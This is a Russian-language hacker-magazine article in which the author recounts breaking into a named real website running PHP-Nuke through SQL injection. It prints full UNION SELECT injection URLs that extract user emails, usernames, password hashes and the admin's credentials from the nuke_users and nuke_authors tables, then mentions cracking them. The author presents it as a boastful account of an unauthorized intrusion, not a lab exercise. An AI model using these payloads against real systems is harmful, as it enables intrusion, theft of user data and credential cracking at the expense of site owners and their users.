Недавно захожу на сайт http://gamesofgold.com своего старого «знакомого», админа злополучного форума http://talkgold.com (мне нужны были урлы egold-инвесторок) и случайно вижу следующую картину: файлу modules.php Php-Nuke передаются следующие параметры:  name=TLS&cat=1. Автоматически, просто по привычке, добавляю кавычку после 1 и получаю знакомый ответ:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/gamesof/gamesofgold.com/html/includes/sql_layer.php on line 286

Ну думаю, поехали, откладываю сбор урлов egold-инвесторок на потом, подбираю количество полей:

http://gamesofgold.com/modules.php?name=TLS& cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22/*

Вижу выводится поля 6 и 9, дальше начинаю подбирать имена таблиц, вручную этого делать не хотелось, поэтому запускаю SQL Injection Tools на перебор и в ответ ничего не получаю. Естественно, имена таблиц и полей в Php-Nuke отличаются от имеющихся в небольшой базе SQL Injection Tools. Нахожу на диске Xakepа версию 7.1 Php-Nuke и ставлю у себя на локальном сервере.

Захожу в MySQL базу Php-Nuke, вижу название таблицы nuke_users, выполняю запрос и точно есть:

http://gamesofgold.com/modules.php? name=TLS&cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+from+nuke_users/*

Пробую вывести значение поля 6:

http://gamesofgold.com/modules.php? name=TLS&cat=1+union+select+1,2,3,4,5,user_email,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22+from+nuke_users/*

мыла зарегистрированных юзеров у меня, забираю логины и хеши-пароли из полей username и user_password.

Ну и на последок, воспользовавшись конструкцией limit, еще раз сверяю пароль и логин админа

http://gamesofgold.com/modules.php? name=TLS&cat=1+union+select+1,2,3,4,5,username,7,8,user_password,10,11,12,13, 14,15,16,17,18,19,20,21,22+from+nuke_users+limit%202,1/*

не забывая извлечь его логин и пароль также из таблицы nuke_authors:

http://gamesofgold.com/modules.php? name=TLS&cat=1+union+select+1,2,3,4,5,aid,7,8,pwd,10,11,12,13, 14,15,16,17,18,19,20,21,22+from+nuke_authors/*

и скармливаю их PasswordPro, а после возвращаюсь к сбору урлов живых egold-инвесторок.

Ну вроде и все. Вывод файлов через load_file () не сработал, мне показали сообщение, что «я не нравлюсь админу». Ну и слава Богу. Хоть здесь админ натурал, хоть и криворукий.

А вы, если будете на gamesofgold.com, передавайте ему привет от durito.

Оставить мнение

Check Also

Хакеры скомпрометировали LabCorp, крупнейшую в США сеть диагностических лабораторий

Крупнейшая в США сеть диагностических лабораторий, LabCorp, в начале текущей недели была а…